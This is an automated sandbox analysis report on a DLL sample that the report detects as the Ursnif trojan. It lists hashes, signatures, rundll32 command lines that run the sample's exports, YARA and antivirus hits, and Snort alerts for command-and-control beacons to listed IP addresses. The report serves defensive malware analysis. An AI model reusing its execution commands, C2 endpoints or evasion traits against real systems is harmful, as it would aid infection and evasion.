Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report qT9Qk5aKTk.dll

Overview

General Information

Sample Name:qT9Qk5aKTk.dll
Analysis ID:481107
MD5:58d9e2906f42336e9bee1137b4cf5839
SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Writes or reads registry keys via WMI
PE file has nameless sections
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5004 cmdline: loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 2800 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1404 cmdline: rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5828 cmdline: regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2760 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 1112 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3340 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5784 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2448 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5440 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6440 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6540 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6840 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7160 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2736 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 1020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4844 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5680 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4196 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4868 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 580 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7044 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6660 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6668 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1744 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7100 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 77 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            25.2.rundll32.exe.510000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              25.0.rundll32.exe.510000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.400000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  19.2.rundll32.exe.400000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    25.0.rundll32.exe.510000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 38 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: qT9Qk5aKTk.dllVirustotal: Detection: 80%Perma Link
                      Source: qT9Qk5aKTk.dllMetadefender: Detection: 59%Perma Link
                      Source: qT9Qk5aKTk.dllReversingLabs: Detection: 82%
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: qT9Qk5aKTk.dllAvira: detected
                      Source: 0.2.loaddll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 19.0.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 33.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 19.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 19.0.rundll32.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 3.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: qT9Qk5aKTk.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.7:49723 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.7:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.2.70:443 -> 192.168.2.7:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.2.70:443 -> 192.168.2.7:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.19.102:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.19.102:443 -> 192.168.2.7:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.7:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49778 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.7:49780 version: TLS 1.2
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb& source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000029.00000003.411166142.0000000005353000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411166142.0000000005353000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb) source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbm/pZ source: WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb3 source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbn.xP source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000023.00000003.376951522.00000000056E4000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000023.00000003.363884828.00000000053A3000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbN~g source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbU^ source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdb= source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000023.00000003.376618336.00000000056D2000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411054361.0000000005342000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000023.00000003.376792297.00000000056D0000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411820381.0000000005340000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000023.00000003.376845164.00000000056D8000.00000004.00000040.sdmp, WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000023.00000003.376951522.00000000056E4000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbn'xY source: WerFault.exe, 00000029.00000003.411872528.0000000005349000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000023.00000003.376583974.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000029.00000003.411360352.0000000005171000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F912D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F912D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_023E12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_023E12D4

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49824 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49887 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49887 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49935 -> 13.225.29.204:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49935 -> 13.225.29.204:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49938 -> 13.225.29.191:80
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
                      Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
